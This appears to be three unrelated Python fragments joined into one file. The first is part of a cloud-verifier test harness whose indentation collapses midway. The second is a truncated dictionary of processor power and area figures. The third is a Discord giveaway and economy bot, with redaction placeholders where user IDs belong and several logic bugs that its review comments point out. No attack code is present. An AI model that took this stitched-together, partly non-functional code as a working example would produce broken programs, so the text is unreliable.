        #validate (shallow) response body: JSON-level equality with the expected body
        if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
        #validate (deep) response body via a named check method on this instance
        check_function = test_functions.get("check_function")
        if check_function is not None:
            check_argument = check_function.get("argument")
            # NOTE(review): the check methods in this class fail the test
            # internally and return None, so this truthy-return branch looks
            # unreachable in practice — confirm whether any check returns True.
            if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
                self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
        # call the post_function
        post_function = test_functions.get("post_function")
        if post_function is not None:
            post_function_name = post_function.get('name')
            post_function_args = post_function.get('args')
            function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
            if function_return == False:
                self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
        temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
except Exception as e:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif isinstance(argument, file):
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
    def launch_cloudverifier(self, argument):
        """Start the cloud verifier as a subprocess, optionally seeding its
        persistence file from *argument* first.  Always returns True."""
        readKUV()
        #modify the persistence file per the passed argument
        if argument is not None:
            # NOTE(review): modify_persistence_file() has no return statement,
            # so string_to_write is always None here; the call matters only
            # for its side effect on the persistence file.
            string_to_write = self.modify_persistence_file(argument)
        global cv_process
        # Launch detached via the shell and give the verifier a second to
        # come up before the caller proceeds.
        cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
        time.sleep(1)
        return True
def overwrite_config_file(self, path, section, option, value):
parser = ConfigParser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# Writing our configuration file to 'example.ini'
with open(path, 'wb') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port | |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.221497,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.376662,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.28152,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.538558,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.932588,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.534866,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.00601,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.335867,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.789,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.242107,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0195232,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.22063,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.144386,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.462738,
'Execution Unit/Register Files/Runtime Dynamic': 0.163909,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.593815,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.46857,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.42053,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000481011,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000481011,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000417057,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000160409,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00207411,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00345319,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00467987,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.138802,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.326142,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.471433,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.94451,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.137884,
'L2/Runtime Dynamic': 0.03632,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.88639,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.30487,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.150415,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.150415,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.59958,
'Load Store Unit/Runtime Dynamic': 3.19708,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.370898,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.741795,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.131633,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.133676,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0535466,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.786061,
'Memory Management Unit/Runtime Dynamic': 0.187223,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.843,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.844658,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0377029,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.26612,
'Renaming Unit/Int Front End RAT/Subthreshold | |
import discord, timeago, requests, datetime,random, json, time, os, urbandict
from os import listdir
from library import constants, funcs
from discord.ext import commands
from colorthief import ColorThief
import keep_alive
from discord.utils import get
from dhooks import Webhook
from discord_buttons_plugin import *
import asyncio
from discord.ext.tasks import loop
# Reset the persisted giveaway-init status flag to 0 on startup so a previous
# run's in-progress state does not leak into this session.
with open("data/gawinit.json","r") as m:
    gawinit = json.load(m)
gawinit["status"] = 0
with open("data/gawinit.json","w") as z:
    json.dump(gawinit,z)
# Bot instance with all gateway intents; prefix and theming come from the
# project-level constants module.
bot = commands.Bot(command_prefix = constants.Config.PREFIX, intents=discord.Intents.all())
buttons = ButtonsClient(bot)
# Convenience attributes stashed on the bot object for reuse across commands.
bot.cur = constants.Config.CURRENCY_ICON
bot.w_arrow = constants.Emotes.w_arrow
bot.p_arrow = constants.Emotes.p_arrow
bot.color = constants.Config.COLOR_THEME
currencyname = constants.Config.CURRENCY_NAME
TOKEN = constants.Config.BOT_TOKEN
class HierarchyError(commands.CommandError):
    """Raised when a role-hierarchy requirement is violated."""
    def __init__(self, message="Role hierarchy wrong."):
        self.message = message
        super().__init__(message)
async def getuser(userid: int):
    """Look up a user by id in the bot's cache and return the result."""
    return bot.get_user(userid)
import topgg
# This example uses topggpy's webhook system.
# The port must be a number between 1024 and 49151.
dbl_token = 'Top.gg token' # set this to your bot's Top.gg token
# NOTE(review): dbl_token is never used below — the webhook manager is created
# with only the "HelloTrial" auth secret; confirm whether the token is needed.
bot.topgg_webhook = topgg.WebhookManager(bot).dsl_webhook("/dsl", "HelloTrial")
bot.topgg_webhook.run(6969) # this method can be awaited as well
@bot.event
async def on_dsl_vote(data):
    """An event that is called whenever someone votes for the bot on Top.gg.

    Test payloads are re-dispatched to on_dsl_test; real votes DM the voter
    a thank-you embed.
    """
    if data["type"] == "test":
        # this is roughly equivalent to
        # return await on_dbl_test(data) in this case
        return bot.dispatch('dsl_test', data)
    # BUG FIX: the original created a fresh, never-connected discord.Client()
    # and called get_user on it; that client's cache is empty, so get_user
    # always returned None and user.send crashed.  Use the running bot's
    # cache via the shared getuser helper instead.
    user = await getuser(int(data["user"]))
    embed = discord.Embed(title='Thanks for Voting!', description = f"**You have recieved:**\n20 {bot.cur}", color = discord.Color.random())
    await user.send(embed=embed)
@bot.event
async def on_dsl_test(data):
    """An event that is called whenever someone tests the webhook system for your bot on Top.gg."""
    print(f"Received a test vote:\n{data}")
    voter = await getuser(int(data["user"]))
    thanks = discord.Embed(title='Thanks for Voting!', description = f"**You have recieved:**\n20 {bot.cur}", color = discord.Color.random())
    await voter.send(embed=thanks)
async def is_botdev(ctx):
    """Command check: True when the author's id or one of their top three
    roles is listed in constants.Roles.BOTMODS.

    BUG FIX: the original indexed ctx.author.roles[-2] and roles[-3]
    unconditionally, raising IndexError for members holding fewer than
    three roles.  Slicing the top three roles handles any role count.
    """
    mod_ids = constants.Roles.BOTMODS
    if ctx.author.id in mod_ids:
        return True
    return any(role.id in mod_ids for role in ctx.author.roles[-3:])
async def is_staff(ctx):
    """Command check: True when the author holds the configured STAFF role."""
    staff_role = discord.utils.find(lambda r: r.id == constants.Roles.STAFF, ctx.message.guild.roles)
    return staff_role in ctx.author.roles
async def is_not_blacklisted(ctx):
    """Command check: True unless the author is flagged in the blacklist data."""
    # Ensure the author has a blacklist record, then read the flag.
    funcs.open_bl(ctx.author)
    records = funcs.get_bl_data()
    return not records[str(ctx.author.id)]["blacked"]
@bot.command(name='trial')
async def trial(ctx):
    """Debug command: print the cache lookup for the hard-coded guild id."""
    target_guild = bot.get_guild(824623762053529672)
    print(target_guild)
@loop()
async def gaw_utils(ctx):
    """Background giveaway ticker: each pass decrements every stored
    giveaway's timer, refreshes its embed, and finishes it (picks a winner,
    DMs winner and host, deletes the record) when the timer reaches zero.

    NOTE(review): @loop() invokes the task with no arguments, yet the
    signature requires `ctx` (read near the end for an embed colour) —
    confirm how this task is actually started.
    """
    with open("data/gaw.json","r") as f:
        gaw = json.load(f)
    for item in gaw:
        try:
            guildid = gaw[item]["guild"]
            authorid = gaw[item]["author"]
            guild = bot.get_guild(guildid)
            reqid = gaw[item]["req"]
            prize = gaw[item]["prize"]
            channelid = gaw[item]["channel"]
            author = bot.get_user(authorid)
            channel = guild.get_channel(int(channelid))
            gawid = gaw[item]["gawid"]
            msgid = gaw[item]["msgid"]
            new_msg = await channel.fetch_message(msgid)
        except KeyError:
            # NOTE(review): this resets `item` to the *last* key of gaw and
            # falls through with stale locals — almost certainly not the
            # intended recovery path; confirm.
            for itemz in gaw:
                item = itemz
        # A stored req of the string "None" means "no requirement".
        if reqid != "None":
            reqid = f"<@{reqid}>"
        if gaw[item]["time"] == 0:
            # Giveaway expired: pick a winner from the first reaction's users.
            winner = "Unable to get winner"
            winnerz = False
            try:
                users = await new_msg.reactions[0].users().flatten()
                users.pop(users.index(bot.user))
                winner = random.choice(users)
            except IndexError:
                await new_msg.reply("No one reacted to this giveaway")
            # NOTE(review): winnerz is never set True, so the announcement
            # reply below is unreachable; and when no one reacted, `winner`
            # stays a str, so winner.mention below raises AttributeError.
            if winnerz == False:
                pass
            else:
                await new_msg.reply(f"{winner.mention} won {prize}")
            embed = discord.Embed(title = "Giveaway!", description = f"{prize}", color = author.color)
            embed.add_field(name = f"Winner:", value = f"{winner.mention}")
            embed.add_field(name = "Requirement:", value = f"{reqid}")
            embed.add_field(name = "By:", value = f"{author.mention}",inline=False)
            embed.add_field(name = "Id:", value = f"{gawid}",inline=True)
            embed.set_footer(text = f"Ended")
            embed.set_thumbnail(url="https://i.pinimg.com/originals/eb/2a/8f/eb2a8f4ddfb50c23712a3cd0d5cc2a3a.gif")
            await new_msg.edit(embed=embed)
            winbed = discord.Embed(title="You Won",description=f"You won {prize} in {guild.name}\nDM {author.name} for your prize if not already paid",color=author.color)
            await winner.send(embed=winbed)
            authbed = discord.Embed(title="Giveaway over",description=f"{winner.name} won {prize}",color=winner.color)
            await author.send(embed=authbed)
            # NOTE(review): deleting while iterating gaw, then decrementing
            # gaw[item]["time"] below on the now-deleted key, will raise —
            # the finished branch should `continue`/`break`; confirm.
            del gaw[item]
            with open("data/gaw.json","w") as gawz:
                json.dump(gaw,gawz)
            pass
        await asyncio.sleep(1)
        gaw[item]["time"] -= 1
        with open("data/gaw.json","w") as gawz:
            json.dump(gaw,gawz)
        timez = gaw[item]["time"]
        # Humanise the remaining time.  NOTE(review): after rescaling, timez
        # is in minutes/hours/days but the later comparisons still use second
        # thresholds, and the timedelta below treats the rescaled value as
        # seconds — the "Ends At" footer is wrong for long giveaways; confirm.
        comment = f"**{timez}** second(s) from now!"
        if timez > 60:
            timez = float(timez) / 60
            timez = round(timez)
            comment = f"**{timez}** minute(s) from now!"
        if timez > 3600:
            timez = float(timez) / 3600
            timez = round(timez)
            comment = f"**{timez}** hour(s) from now!"
        if timez > 86400:
            timez = float(timez) / 86400
            timez = round(timez)
            comment = f"**{timez}** day(s) from now!"
        embed = discord.Embed(title = "Giveaway!", description = f"{prize}", color = ctx.author.color)
        end = datetime.datetime.utcnow() + datetime.timedelta(seconds = timez)
        embed.add_field(name = f"Ends at:", value = comment)
        embed.add_field(name = "Requirement:", value = f"{reqid}")
        embed.add_field(name = "By:", value = f"{author.mention}",inline=False)
        embed.add_field(name = "Id:", value = f"{gawid}",inline=True)
        embed.set_footer(text = f"Ends At: {end} UTC")
        embed.set_thumbnail(url="https://i.pinimg.com/originals/eb/2a/8f/eb2a8f4ddfb50c23712a3cd0d5cc2a3a.gif")
        await new_msg.edit(embed=embed)
        pass
@loop(seconds=10)
async def change_status():
    """Rotate the bot's Do-Not-Disturb presence: pick a random activity type
    and a random status line each cycle."""
    await asyncio.sleep(8)
    activity_map = {
        "playing": discord.ActivityType.playing,
        "listening": discord.ActivityType.listening,
        "watching": discord.ActivityType.watching,
    }
    statuses = ["Doggo Dankers","Niraj swearing","Levi be Catfishing","Ace spamming lines of code","Oh my Eris what are you doing","Hi I'm Joe, I sell dildos","dd?help","Percy likes dogs do you?","Made by Ace and Eris","#DoggoDankers","Bark Bark Bark","Why What When Why How","dog.exe has started",f"Would you like some doggocoins?","Levi be cute","Eris == Kaneki","Bow down humans","Well hello there","Why are you looking at this?","Living legend"]
    modal = random.choice(["playing","listening","watching"])
    status = random.choice(statuses)
    # Single dispatch through the map replaces the original if-chain.
    await bot.change_presence(status = discord.Status.do_not_disturb, activity=discord.Activity(type=activity_map[modal], name=f"{status}"))
@bot.event
async def on_ready():
    """Once the gateway is ready, start the background presence and
    dog-picture loops."""
    print('Ready!')
    for background_task in (change_status(), doggostart()):
        bot.loop.create_task(background_task)
@loop(minutes=1)
async def doggostart():
    """Every minute, post a random dog picture to the configured webhook."""
    webhook = Webhook('https://discord.com/api/webhooks/<KEY>')
    dog_api = requests.request('GET', url='https://dog.ceo/api/breeds/image/random')
    bork = discord.Embed(title='Bork Bork!', colour = discord.Color.random())
    bork.set_image(url=dog_api.json()["message"])
    bork.set_footer(text='Awwwwwww')
    webhook.send(embed=bork)
@loop(seconds=5)
async def maintain_nicks():
    """Every five seconds, re-apply the nickname 'Ace' to the hard-coded user."""
    # BUG FIX: bot.get_user() is synchronous; the original `await`ed it,
    # which raises TypeError ("object ... can't be used in 'await' expression").
    user = bot.get_user(775198018441838642)
    # NOTE(review): a User object has no per-guild nickname; editing a nick
    # normally requires a guild Member — confirm the intended guild and use
    # guild.get_member(...) if this task is ever enabled.
    await user.edit(nick='Ace')
# Drop the built-in help command so the custom `help` command below can register.
bot.remove_command("help")
@bot.command(name="ban")
async def ban(ctx):
    # NOTE(review): "<PASSWORD>" is a redaction placeholder left by source
    # sanitisation (originally a hard-coded Discord user id); the file will
    # not parse until a real integer id is restored.
    if ctx.author.id != <PASSWORD>:
        return await ctx.send("only for eris")
    # Self-ban: bans the *invoking* author (only the hard-coded user may run it).
    await ctx.guild.ban(ctx.author)
@bot.command(name="help")
@commands.check(is_not_blacklisted)
async def help(ctx):
    """Custom help command: sends the DoggoBot economy overview embed."""
    overview = discord.Embed(
        title='DoggoBot',
        description = "**DoggoCoins can be earned by:**\n1. Bumping the server in <#824641127315406888>\n2. Through commands like `=beg` and `=daily`\n3. Voting for us on Top.gg\n4. Boosting the Server\n5. Investing in Us.\n\n**DoggoCoins can be used for:**\n1. Trading into DMC\n2. For awesome server perks like extra claimtime, private rooms, etc.\nUse `=shop` to know more.",
        color = bot.color,
    )
    overview.set_footer(text="While frowned upon you can do anything with these coins such as bet or giveaways")
    await ctx.send(embed=overview)
@bot.command(name='start')
async def _sneckstart(ctx):
    # NOTE(review): "<PASSWORD>" tokens are redaction placeholders left by
    # source sanitisation (originally hard-coded user ids); the file will not
    # parse until real integer ids are restored.
    # NOTE(review): `a != X or a != Y` is always True for distinct X and Y,
    # so this guard returns for *everyone* — it almost certainly should be
    # `and` (or `ctx.author.id not in (X, Y)`).
    if ctx.author.id != <PASSWORD> or ctx.author.id != <PASSWORD>:
        return
    # Locate the three hard-coded roles by display name.
    for role in ctx.guild.roles:
        if role.name == "・mai sakurajima":
            print(role)
            role1 = role
            print(role1)
        elif role.name == "・levi's guard":
            role2= role
            print(role2)
        elif role.name == "・co owner":
            role3 = role
        else:
            pass
